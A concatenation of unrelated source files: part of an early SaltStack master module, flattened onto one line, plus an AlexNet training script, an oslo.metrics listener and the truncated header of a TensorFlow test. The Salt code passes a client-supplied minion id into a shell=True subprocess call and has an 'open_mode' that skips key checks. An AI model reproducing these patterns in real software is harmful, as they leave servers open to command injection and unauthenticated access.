Invalid jid, scrub the dir shutil.rmtree(f_path) elif int(cur) - int(jid[:10]) > self.opts['keep_jobs']: shutil.rmtree(f_path) try: time.sleep(60) except KeyboardInterrupt: break def start(self): ''' Turn on the master server components ''' enable_sigusr1_handler() log.warn('Starting the Salt Master') clear_old_jobs_proc = multiprocessing.Process( target=self._clear_old_jobs) clear_old_jobs_proc.start() reqserv = ReqServer( self.opts, self.crypticle, self.key, self.master_key) reqserv.start_publisher() reqserv.start_event_publisher() def sigterm_clean(signum, frame): ''' Cleaner method for stopping multiprocessing processes when a SIGTERM is encountered. This is required when running a salt master under a process minder like daemontools ''' mypid = os.getpid() log.warn(('Caught signal {0}, stopping the Salt Master' .format(signum))) clean_proc(clear_old_jobs_proc) clean_proc(reqserv.publisher) clean_proc(reqserv.eventpublisher) for proc in reqserv.work_procs: clean_proc(proc) raise MasterExit signal.signal(signal.SIGTERM, sigterm_clean) try: reqserv.run() except KeyboardInterrupt: # Shut the master down gracefully on SIGINT log.warn('Stopping the Salt Master') raise SystemExit('\nExiting on Ctrl-c') class Publisher(multiprocessing.Process): ''' The publishing interface, a simple zeromq publisher that sends out the commands. ''' def __init__(self, opts): super(Publisher, self).__init__() self.opts = opts def run(self): ''' Bind to the interface specified in the configuration file ''' # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) pub_sock.setsockopt(zmq.HWM, 1) pub_uri = 'tcp://{0[interface]}:{0[publish_port]}'.format(self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) # Start the minion command publisher log.info('Starting the Salt Publisher on {0}'.format(pub_uri)) pub_sock.bind(pub_uri) pull_sock.bind(pull_uri) # Restrict access to the socket os.chmod( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc'), 448 ) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: package = pull_sock.recv() pub_sock.send(package) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: pub_sock.close() pull_sock.close() class ReqServer(object): ''' Starts up the master request server, minions send results to this interface. ''' def __init__(self, opts, crypticle, key, mkey): self.opts = opts self.master_key = mkey self.context = zmq.Context(self.opts['worker_threads']) # Prepare the zeromq sockets self.uri = 'tcp://%(interface)s:%(ret_port)s' % self.opts self.clients = self.context.socket(zmq.ROUTER) self.workers = self.context.socket(zmq.DEALER) self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) # Prepare the AES key self.key = key self.crypticle = crypticle def __bind(self): ''' Binds the reply server ''' log.info('Setting up the master communication server') self.clients.bind(self.uri) self.work_procs = [] for ind in range(int(self.opts['worker_threads'])): self.work_procs.append(MWorker(self.opts, self.master_key, self.key, self.crypticle)) for ind, proc in enumerate(self.work_procs): log.info('Starting Salt worker process {0}'.format(ind)) proc.start() self.workers.bind(self.w_uri) while True: try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc def start_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.publisher = Publisher(self.opts) self.publisher.start() def start_event_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.eventpublisher = salt.utils.event.EventPublisher(self.opts) self.eventpublisher.start() def run(self): ''' Start up the ReqServer ''' self.__bind() class MWorker(multiprocessing.Process): ''' The worker multiprocess instance to manage the backend operations for the salt master. ''' def __init__(self, opts, mkey, key, crypticle): multiprocessing.Process.__init__(self) self.opts = opts self.serial = salt.payload.Serial(opts) self.crypticle = crypticle self.mkey = mkey self.key = key def __bind(self): ''' Bind to the local port ''' context = zmq.Context(1) socket = context.socket(zmq.REP) w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Worker binding to socket {0}'.format(w_uri)) try: socket.connect(w_uri) while True: try: package = socket.recv() payload = self.serial.loads(package) ret = self.serial.dumps(self._handle_payload(payload)) socket.send(ret) # Properly handle EINTR from SIGUSR1 except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: socket.close() def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server ''' key = load = None try: key = payload['enc'] load = payload['load'] except KeyError: return '' return {'aes': self._handle_aes, 'pub': self._handle_pub, 'clear': self._handle_clear}[key](load) def _handle_clear(self, load): ''' Take care of a cleartext command ''' log.info('Clear payload received with command %(cmd)s', load) return getattr(self.clear_funcs, load['cmd'])(load) def _handle_pub(self, load): ''' Handle a command sent via a public key pair ''' log.info('Pubkey payload received with command %(cmd)s', load) def _handle_aes(self, load): ''' Handle a command sent via an aes key ''' try: data = self.crypticle.loads(load) except Exception: return '' if 'cmd' not in data: log.error('Received malformed command {0}'.format(data)) return {} log.info('AES payload received with command {0}'.format(data['cmd'])) return self.aes_funcs.run_func(data['cmd'], data) def run(self): ''' Start a Master Worker ''' self.clear_funcs = ClearFuncs( self.opts, self.key, self.mkey, self.crypticle) self.aes_funcs = AESFuncs(self.opts, self.crypticle) self.__bind() class AESFuncs(object): ''' Set up functions that are available when the load is encrypted with AES ''' # The AES Functions: # def __init__(self, opts, crypticle): self.opts = opts self.event = salt.utils.event.SaltEvent( self.opts['sock_dir'], 'master' ) self.serial = salt.payload.Serial(opts) self.crypticle = crypticle # Make a client self.local = salt.client.LocalClient(self.opts['conf_file']) def __find_file(self, path, env='base'): ''' Search the environment for the relative path ''' fnd = {'path': '', 'rel': ''} if env not in self.opts['file_roots']: return fnd for root in self.opts['file_roots'][env]: full = os.path.join(root, path) if os.path.isfile(full): fnd['path'] = full fnd['rel'] = path return fnd return fnd def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key ''' pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) with open(pub_path, 'r') as fp_: minion_pub = fp_.read() fd_, tmp_pub = tempfile.mkstemp() os.close(fd_) with open(tmp_pub, 'w+') as fp_: fp_.write(minion_pub) pub = None try: pub = RSA.load_pub_key(tmp_pub) except RSA.RSAError, e: log.error('Unable to load temporary public key "{0}": {1}' .format(tmp_pub, e)) try: os.remove(tmp_pub) if pub.public_decrypt(token, 5) == 'salt': return True except RSA.RSAError, e: log.error('Unable to decrypt token: {0}'.format(e)) log.error('Salt minion claiming to be {0} has attempted to' 'communicate with the master and could not be verified' .format(id_)) return False def _ext_nodes(self, load): ''' Return the results from an external node classifier if one is specified ''' if not 'id' in load: log.error('Received call for external nodes without an id') return {} if not self.opts['external_nodes']: return {} if not salt.utils.which(self.opts['external_nodes']): log.error(('Specified external nodes controller {0} is not' ' available, please verify that it is installed' '').format(self.opts['external_nodes'])) return {} cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id']) ndata = yaml.safe_load( subprocess.Popen( cmd, shell=True, stdout=subprocess.PIPE ).communicate()[0]) ret = {} if 'environment' in ndata: env = ndata['environment'] else: env = 'base' if 'classes' in ndata: if isinstance(ndata['classes'], dict): ret[env] = list(ndata['classes']) elif isinstance(ndata['classes'], list): ret[env] = ndata['classes'] else: return ret return ret def _serve_file(self, load): ''' Return a chunk from a file based on the data received ''' ret = {'data': '', 'dest': ''} if 'path' not in load or 'loc' not in load or 'env' not in load: return ret fnd = self.__find_file(load['path'], load['env']) if not fnd['path']: return ret ret['dest'] = fnd['rel'] with open(fnd['path'], 'rb') as fp_: fp_.seek(load['loc']) ret['data'] = fp_.read(self.opts['file_buffer_size']) return ret def _file_hash(self, load): ''' Return a file hash, the hash type is set in the master config file ''' if 'path' not in load or 'env' not in load: return '' path = self.__find_file(load['path'], load['env'])['path'] if not path: return {} ret = {} with open(path, 'rb') as fp_: ret['hsum'] = getattr(hashlib, self.opts['hash_type'])( fp_.read()).hexdigest() ret['hash_type'] = self.opts['hash_type'] return ret def _file_list(self, load): ''' Return a list of all files on the file server in a specified environment ''' ret = [] if load['env'] not in self.opts['file_roots']: return ret for path in self.opts['file_roots'][load['env']]: for root, dirs, files in os.walk(path, followlinks=True): for fn in files: ret.append( os.path.relpath( os.path.join( root, fn ), path ) ) return ret def _file_list_emptydirs(self, load): ''' Return a list of all empty directories on the master ''' ret = [] if load['env'] not in self.opts['file_roots']: return ret for path in self.opts['file_roots'][load['env']]: for root, dirs, files in os.walk(path, followlinks=True): if len(dirs) == 0 and len(files) == 0: ret.append(os.path.relpath(root, path)) return ret def _master_opts(self, load): ''' Return the master options to the minion ''' return self.opts def _pillar(self, load): ''' Return the pillar data for the minion ''' if 'id' not in load or 'grains' not in load or 'env' not in load: return False pillar = salt.pillar.Pillar( self.opts, load['grains'], load['id'], load['env']) return pillar.compile_pillar() def _master_state(self, load): ''' Call the master to compile a master side highstate ''' if 'opts' not in load or 'grains' not in load: return False return salt.state.master_compile( self.opts, load['opts'], load['grains'], load['opts']['id'], load['opts']['environment']) def _return(self, load): ''' Handle the return data sent from the minions ''' # If the return data is invalid, just ignore it if 'return' not in load or 'jid' not in load or 'id' not in load: return False log.info('Got return from {0[id]} for job {0[jid]}'.format(load)) self.event.fire_event(load, load['jid']) if not self.opts['job_cache']: return jid_dir = salt.utils.jid_dir( load['jid'], self.opts['cachedir'], self.opts['hash_type'] ) if not os.path.isdir(jid_dir): log.error( 'An inconsistency occurred, a job was received with a job id ' 'that is not present on the master: %(jid)s', load ) return False hn_dir = os.path.join(jid_dir, load['id']) if not os.path.isdir(hn_dir): os.makedirs(hn_dir) # Otherwise the minion has already returned this jid and it should # be dropped else: log.error( ('An extra return was detected from minion {0}, please' ' verify the minion, this could be a replay' ' attack').format(load['id']) ) return False self.serial.dump(load['return'], open(os.path.join(hn_dir, 'return.p'), 'w+')) if 'out' in load: self.serial.dump(load['out'], open(os.path.join(hn_dir, 'out.p'), 'w+')) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. ''' # Verify the load if 'return' not in load or 'jid' not in load or 'id' not in load: return None # set the write flag jid_dir = salt.utils.jid_dir( load['jid'], self.opts['cachedir'], self.opts['hash_type'] ) if not os.path.isdir(jid_dir): log.error( 'An inconsistency occurred, a job was received with a job id ' 'that is not present on the master: %(jid)s', load ) return False wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id'])) try: with open(wtag, 'w+') as fp_: fp_.write('') except (IOError, OSError): log.error( ('Failed to commit the write tag for the syndic return,' ' are permissions correct in the cache dir:' ' {0}?').format(self.opts['cachedir']) ) return False # Format individual return loads for key, item in load['return'].items(): ret = {'jid': load['jid'], 'id': key, 'return': item} self._return(ret) if os.path.isfile(wtag): os.remove(wtag) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data ''' if 'peer_run' not in self.opts: return {} if not isinstance(self.opts['peer_run'], dict): return {} if 'fun' not in clear_load\ or 'arg' not in clear_load\ or 'id' not in clear_load\ or 'tok' not in clear_load: return {} if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! msg = 'Minion id {0} is not who it says it is!'.format( clear_load['id']) log.warn(msg) return {} perms = set() for match in self.opts['peer_run']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer_run'][match], list): perms.update(self.opts['peer_run'][match]) good = False for perm in perms: if re.match(perm, clear_load['fun']): good = True if not good: return {} # Prepare the runner object opts = {'fun': clear_load['fun'], 'arg': clear_load['arg'], 'doc': False, 'conf_file': self.opts['conf_file']} opts.update(self.opts) runner = salt.runner.Runner(opts) return runner.run() def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: peer: .*: - .* This configuration will enable all minions to execute all commands. peer: foo.example.com: - test.* This configuration will only allow the minion foo.example.com to execute commands from the test module ''' # Verify that the load is valid if 'peer' not in self.opts: return {} if not isinstance(self.opts['peer'], dict): return {} if 'fun' not in clear_load\ or 'arg' not in clear_load\ or 'tgt' not in clear_load\ or 'ret' not in clear_load\ or 'tok' not in clear_load\ or 'id' not in clear_load: return {} # If the command will make a recursive publish don't run if re.match('publish.*', clear_load['fun']): return {} # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! msg = 'Minion id {0} is not who it says it is!'.format( clear_load['id']) log.warn(msg) return {} perms = set() for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.update(self.opts['peer'][match]) good = False if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ for perm in perms: if isinstance(clear_load['fun'], list): good = True for fun in clear_load['fun']: if not re.match(perm, fun): good = False else: if re.match(perm, clear_load['fun']): good = True if not good: return {} # Set up the publication payload jid = salt.utils.prep_jid( self.opts['cachedir'], self.opts['hash_type'] ) load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt_type': clear_load.get('tgt_type', 'glob'), 'tgt': clear_load['tgt'], 'jid': jid, 'ret': clear_load['ret'], 'id': clear_load['id'], } self.serial.dump( load, open( os.path.join( salt.utils.jid_dir( jid, self.opts['cachedir'], self.opts['hash_type'] ), '.load.p' ), 'w+') ) payload = {'enc': 'aes'} expr_form = 'glob' timeout = 5 if 'tmo' in clear_load: try: timeout = int(clear_load['tmo']) except ValueError: msg = 'Failed to parse timeout value: {0}'.format(clear_load['tmo']) log.warn(msg) return {} if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] expr_form = load['tgt_type'] if 'timeout' in clear_load: timeout = clear_load['timeout'] # Encrypt! payload['load'] = self.crypticle.dumps(load) # Connect to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) log.info(('Publishing minion job: #{0[jid]}, func: "{0[fun]}", args:' ' "{0[arg]}", target: "{0[tgt]}"').format(load)) pub_sock.send(self.serial.dumps(payload)) # Run the client get_returns method based on the form data sent if 'form' in clear_load: ret_form = clear_load['form'] else: ret_form = 'clean' if ret_form == 'clean': return self.local.get_returns( jid, self.local.check_minions( clear_load['tgt'], expr_form ), timeout ) elif ret_form == 'full': ret = self.local.get_full_returns( jid, self.local.check_minions( clear_load['tgt'], expr_form ), timeout ) ret['__jid__'] = jid return ret def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption ''' # Don't honor private functions if func.startswith('__'): return self.crypticle.dumps({}) # Run the func try: ret = getattr(self, func)(load) except AttributeError as exc: log.error(('Received function {0} which in unavailable on the ' 'master, returning False').format(exc)) return self.crypticle.dumps(False) # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) if func == '_return': return ret # AES Encrypt the return return self.crypticle.dumps(ret) class ClearFuncs(object): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key, master_key, crypticle): self.opts = opts self.serial = salt.payload.Serial(opts) self.key = key self.master_key = master_key self.crypticle = crypticle # Create the event manager self.event = salt.utils.event.SaltEvent( self.opts['sock_dir'], 'master' ) # Make a client self.local = salt.client.LocalClient(self.opts['conf_file']) def _send_cluster(self): ''' Send the cluster data out ''' log.debug('Sending out cluster data') ret = self.local.cmd(self.opts['cluster_masters'], 'cluster.distrib', self._cluster_load(), 0, 'list' ) log.debug('Cluster distributed: %s', ret) def _cluster_load(self): ''' Generates the data sent to the cluster nodes. ''' minions = {} master_pem = '' with open(self.opts['conf_file'], 'r') as fp_: master_conf = fp_.read() minion_dir = os.path.join(self.opts['pki_dir'], 'minions') for host in os.listdir(minion_dir): pub = os.path.join(minion_dir, host) minions[host] = open(pub, 'r').read() if self.opts['cluster_mode'] == 'full': with open(os.path.join(self.opts['pki_dir'], 'master.pem')) as fp_: master_pem = fp_.read() return [minions, master_conf, master_pem, self.opts['conf_file']] def _auth(self, load): ''' Authenticate the client, use the sent public key to encrypt the aes key which was generated at start up. This method fires an event over the master event manager. The evnt is tagged "auth" and returns a dict with information about the auth event ''' # 1. Verify that the key we are receiving matches the stored key # 2. Store the key if it is not there # 3. make an rsa key with the pub key # 4. encrypt the aes key as an encrypted salt.payload # 5. package the return and return it log.info('Authentication request from %(id)s', load) pubfn = os.path.join(self.opts['pki_dir'], 'minions', load['id']) pubfn_pend = os.path.join(self.opts['pki_dir'], 'minions_pre', load['id']) pubfn_rejected = os.path.join(self.opts['pki_dir'], 'minions_rejected', load['id']) if self.opts['open_mode']: # open mode is turned on, nuts to checks and overwrite whatever # is there pass elif os.path.isfile(pubfn): # The key has been accepted check it if not open(pubfn, 'r').read() == load['pub']: log.error( 'Authentication attempt from %(id)s failed, the public ' 'keys did not match. This may be an attempt to compromise ' 'the Salt cluster.', load ) ret = {'enc': 'clear', 'load': {'ret': False}} eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret elif os.path.isfile(pubfn_rejected): # The key has been rejected, don't place it in pending log.info('Public key rejected for %(id)s', load) ret = {'enc': 'clear', 'load': {'ret': False}} eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret elif not os.path.isfile(pubfn_pend)\ and not self.opts['auto_accept']: # This is a new key, stick it in pre log.info('New public key placed in pending for %(id)s', load) with open(pubfn_pend, 'w+') as fp_: fp_.write(load['pub']) ret = {'enc': 'clear', 'load': {'ret': True}} eload = {'result': True, 'act': 'pend', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret elif os.path.isfile(pubfn_pend)\ and not self.opts['auto_accept']: # This key is in pending, if it is the same key ret True, else # ret False if not open(pubfn_pend, 'r').read() == load['pub']: log.error( 'Authentication attempt from %(id)s failed, the public ' 'keys in pending did not match. This may be an attempt to ' 'compromise the Salt cluster.', load ) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return {'enc': 'clear', 'load': {'ret': False}} else: log.info( 'Authentication failed from host %(id)s, the key is in ' 'pending and needs to be accepted with salt-key -a %(id)s', load ) eload = {'result': True, 'act': 'pend', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return {'enc': 'clear', 'load': {'ret': True}} elif not os.path.isfile(pubfn_pend)\ and self.opts['auto_accept']: # This is a new key and auto_accept is turned on pass else: # Something happened that I have not accounted for, FAIL! log.warn('Unaccounted for authentication failure') eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return {'enc': 'clear', 'load': {'ret': False}} log.info('Authentication accepted from %(id)s', load) with open(pubfn, 'w+') as fp_: fp_.write(load['pub']) pub = None # The key payload may sometimes be corrupt when using auto-accept # and an empty request comes in try: pub = RSA.load_pub_key(pubfn) except RSA.RSAError, e: log.error('Corrupt public key "{0}": {1}'.format(pubfn, e)) return {'enc': 'clear', 'load': {'ret': False}} ret = {'enc': 'pub', 'pub_key': self.master_key.get_pub_str(), 'token': self.master_key.token, 'publish_port': self.opts['publish_port'], } ret['aes'] = pub.public_encrypt(self.opts['aes'], 4) eload = {'result': True, 'act': 'accept', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. ''' # Verify that the caller has root on master if not clear_load.pop('key') == self.key: return '' jid_dir = salt.utils.jid_dir( clear_load['jid'], self.opts['cachedir'], self.opts['hash_type'] ) # Verify the jid dir if not os.path.isdir(jid_dir): os.makedirs(jid_dir) # Save the invocation information self.serial.dump( clear_load, open(os.path.join(jid_dir, '.load.p'), 'w+') ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. # # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'user' in clear_load: log.info(('User {0[user]} Published command {0[fun]} with jid' ' {0[jid]}').format(clear_load)) load['user'] = clear_load['user'] else: log.info(('Published command {0[fun]} with jid' ' {0[jid]}').format(clear_load)) log.debug('Published command details {0}'.format(load)) payload['load'] = self.crypticle.dumps(load) # Send 0MQ to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) pub_sock.send(self.serial.dumps(payload)) return {'enc': 'clear', 'load': {'jid': clear_load['jid']}}
train.py
""" Written by Matteo Dunnhofer - 2017 models training on ImageNet """ import sys import os.path import time from models import alexnet import tensorflow as tf import train_util as tu import numpy as np import threading def train( epochs, batch_size, learning_rate, dropout, momentum, lmbda, resume, imagenet_path, display_step, test_step, ckpt_path, summary_path): """ Procedure to train the model on ImageNet ILSVRC 2012 training set Args: resume: boolean variable, true if want to resume the training, false to train from scratch imagenet_path: path to ILSRVC12 ImageNet folder containing train images, validation images, annotations and metadata file display_step: number representing how often printing the current training accuracy test_step: number representing how often make a test and print the validation accuracy ckpt_path: path where to save model's tensorflow checkpoint (or from where resume) summary_path: path where to save logs for TensorBoard """ train_img_path = os.path.join(imagenet_path, 'ILSVRC2012_img_train') ts_size = tu.imagenet_size(train_img_path) num_batches = int(float(ts_size) / batch_size) wnid_labels, _ = tu.load_imagenet_meta(os.path.join(imagenet_path, 'data/meta.mat')) x = tf.placeholder(tf.float32, [None, 224, 224, 3]) y = tf.placeholder(tf.float32, [None, 1000]) lr = tf.placeholder(tf.float32) keep_prob = tf.placeholder(tf.float32) # queue of examples being filled on the cpu with tf.device('/gpu:0'): q = tf.FIFOQueue(batch_size * 3, [tf.float32, tf.float32], shapes=[[224, 224, 3], [1000]]) enqueue_op = q.enqueue_many([x, y]) x_b, y_b = q.dequeue_many(batch_size) pred, _ = alexnet.classifier(x_b, keep_prob) # cross-entropy and weight decay with tf.name_scope('cross_entropy'): cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_b, name='cross-entropy')) with tf.name_scope('l2_loss'): l2_loss = tf.reduce_sum(lmbda * tf.stack([tf.nn.l2_loss(v) for v in tf.get_collection('weights')])) tf.summary.scalar('l2_loss', l2_loss) with tf.name_scope('loss'): loss = cross_entropy + l2_loss tf.summary.scalar('loss', loss) # accuracy with tf.name_scope('accuracy'): correct = tf.equal(tf.argmax(pred, 1), tf.argmax(y_b, 1)) accuracy = tf.reduce_mean(tf.cast(correct, tf.float32)) tf.summary.scalar('accuracy', accuracy) global_step = tf.Variable(0, trainable=False) epoch = tf.div(global_step, num_batches) # momentum optimizer with tf.name_scope('optimizer'): optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=momentum).minimize(loss, global_step=global_step) # merge summaries to write them to file merged = tf.summary.merge_all() # checkpoint saver saver = tf.train.Saver() coord = tf.train.Coordinator() #init = tf.initialize_all_variables() init = tf.global_variables_initializer() with tf.Session(config=tf.ConfigProto()) as sess: if resume: saver.restore(sess, os.path.join(ckpt_path, 'alexnet-cnn.ckpt')) else: sess.run(init) # enqueuing batches procedure def enqueue_batches(): while not coord.should_stop(): im, l = tu.read_batch(batch_size, train_img_path, wnid_labels) sess.run(enqueue_op, feed_dict={x: im,y: l}) # creating and starting parallel threads to fill the queue num_threads = 3 for i in range(num_threads): t = threading.Thread(target=enqueue_batches) t.setDaemon(True) t.start() # operation to write logs for tensorboard visualization train_writer = tf.summary.FileWriter(os.path.join(summary_path, 'train'), sess.graph) start_time = time.time() for e in range(sess.run(epoch), epochs): for i in range(num_batches): summary_str,_, step = sess.run([merged,optimizer, global_step], feed_dict={lr: learning_rate, keep_prob: dropout}) train_writer.add_summary(summary_str, step) # decaying learning rate if step == 170000 or step == 350000: learning_rate /= 10 # display current training informations if step % display_step == 0: c, a = sess.run([loss, accuracy], feed_dict={lr: learning_rate, keep_prob: 1.0}) print ('Epoch: {:03d} Step/Batch: {:09d} --- Loss: {:.7f} Training accuracy: {:.4f}'.format(e, step, c, a)) # make test and evaluate validation accuracy if step % test_step == 0: val_im, val_cls = tu.read_validation_batch(batch_size, os.path.join(imagenet_path, 'ILSVRC2012_img_val'), os.path.join(imagenet_path, 'data/ILSVRC2012_validation_ground_truth.txt')) v_a = sess.run(accuracy, feed_dict={x_b: val_im, y_b: val_cls, lr: learning_rate, keep_prob: 1.0}) # intermediate time int_time = time.time() print ('Elapsed time: {}'.format(tu.format_time(int_time - start_time))) print ('Validation accuracy: {:.04f}'.format(v_a)) # save weights to file save_path = saver.save(sess, os.path.join(ckpt_path, 'alexnet-cnn.ckpt')) print('Variables saved in file: %s' % save_path) end_time = time.time() print ('Elapsed time: {}'.format(tu.format_time(end_time - start_time))) save_path = saver.save(sess, os.path.join(ckpt_path, 'alexnet-cnn.ckpt')) print('Variables saved in file: %s' % save_path) coord.request_stop() if __name__ == '__main__': DROPOUT = 0.5 MOMENTUM = 0.9 LAMBDA = 5e-04 # for weight decay LEARNING_RATE = 1e-03 EPOCHS = 90 BATCH_SIZE = 128 CKPT_PATH = 'ckpt-alexnet' if not os.path.exists(CKPT_PATH): os.makedirs(CKPT_PATH) SUMMARY = 'summary' if not os.path.exists(SUMMARY): os.makedirs(SUMMARY) IMAGENET_PATH = 'ILSVRC2012' DISPLAY_STEP = 10 TEST_STEP = 500 if sys.argv[1] == '-resume': resume = True elif sys.argv[1] == '-scratch': resume = False train( EPOCHS, BATCH_SIZE, LEARNING_RATE, DROPOUT, MOMENTUM, LAMBDA, resume, IMAGENET_PATH, DISPLAY_STEP, TEST_STEP, CKPT_PATH, SUMMARY)
__main__.py
# Copyright 2020 LINE Corp. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import select import signal import socket import sys import threading from wsgiref.simple_server import make_server from oslo_config import cfg from oslo_log import log as logging from prometheus_client import make_wsgi_app from oslo_metrics import message_router oslo_metrics_configs = [ cfg.StrOpt('metrics_socket_file', default='/var/tmp/metrics_collector.sock', help='Unix domain socket file to be used' ' to send rpc related metrics'), cfg.IntOpt('prometheus_port', default=3000, help='Port number to expose metrics in prometheus format.'), ] cfg.CONF.register_opts(oslo_metrics_configs, group='oslo_metrics') LOG = logging.getLogger(__name__) CONF = cfg.CONF logging.register_options(CONF) logging.setup(CONF, 'oslo-metrics') LOG.logger.setLevel(logging.DEBUG) class MetricsListener(): def __init__(self, socket_path): self.socket_path = socket_path self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) self.unlink(socket_path) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.bind(self.socket_path) self.start = True self.router = message_router.MessageRouter() def unlink(self, socket_path): try: os.unlink(socket_path) except OSError: if os.path.exists(socket_path): raise def serve(self): while self.start: readable, writable, exceptional = select.select( [self.socket], [], [], 1) if len(readable) == 0: continue try: LOG.debug("wait for socket.recv") # 1 message size should be smaller than 65565 msg = self.socket.recv(65565) LOG.debug("got message") self.router.process(msg) except socket.timeout: pass def stop(self): self.socket.close() self.start = False httpd = None def handle_sigterm(_signum, _frame): LOG.debug("Caught sigterm") shutdown_thread = threading.Thread(target=httpd.shutdown) shutdown_thread.start() def main(): cfg.CONF(sys.argv[1:]) socket_path = cfg.CONF.oslo_metrics.metrics_socket_file m = MetricsListener(socket_path) try: os.chmod(socket_path, 0o660) except OSError: LOG.error("Changing the mode of the file failed.... continuing") mt = threading.Thread(target=m.serve) LOG.info("Start oslo.metrics") mt.start() app = make_wsgi_app() try: global httpd httpd = make_server('', CONF.oslo_metrics.prometheus_port, app) signal.signal(signal.SIGTERM, handle_sigterm) httpd.serve_forever() except KeyboardInterrupt: pass finally: LOG.info("Try to stop...") os.remove(cfg.CONF.oslo_metrics.metrics_socket_file) m.stop() httpd.server_close() if __name__ == "__main__": main()
autocast_variable_test.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for AutoCastVariable.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import threading from absl.testing import parameterized import numpy as np from tensorflow.python import tf2 from tensorflow.python.distribute import combinations as ds_combinations from tensorflow.python.distribute import distribution_strategy_context as ds_context from tensorflow.python.distribute import mirrored_strategy from tensorflow.python.distribute import strategy_combinations from tensorflow.python.distribute import test_util from tensorflow.python.eager import context from tensorflow.python.eager import def_function from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import 